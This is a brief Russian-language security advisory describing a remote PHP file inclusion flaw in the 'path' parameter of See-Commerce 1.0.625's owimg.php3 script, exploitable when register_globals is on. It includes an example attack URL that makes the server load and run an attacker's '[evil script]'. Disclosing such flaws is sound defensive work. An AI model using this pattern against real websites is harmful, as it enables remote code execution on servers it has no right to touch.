• Партнер

  • Программа: See-Commerce 1.0.625, возможно другие
    версии.

    Уязвимость позволяет удаленному
    пользователю выполнить произвольный PHP
    сценарий на целевой системе. Уязвимость
    существует из-за недостаточной обработки
    входных данных в параметре "path" в
    сценарии owimg.php3. Удаленный пользователь
    может выполнить произвольный PHP сценарий на
    целевой системе с привилегиями Web сервера.
    Для удачной эксплуатации уязвимости опция
    "register_globals" должна быть включена в
    конфигурационном файле PHP.

    Пример:

    http://[site]/[see-commerce directory]/owimg.php3?path=[evil script]

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии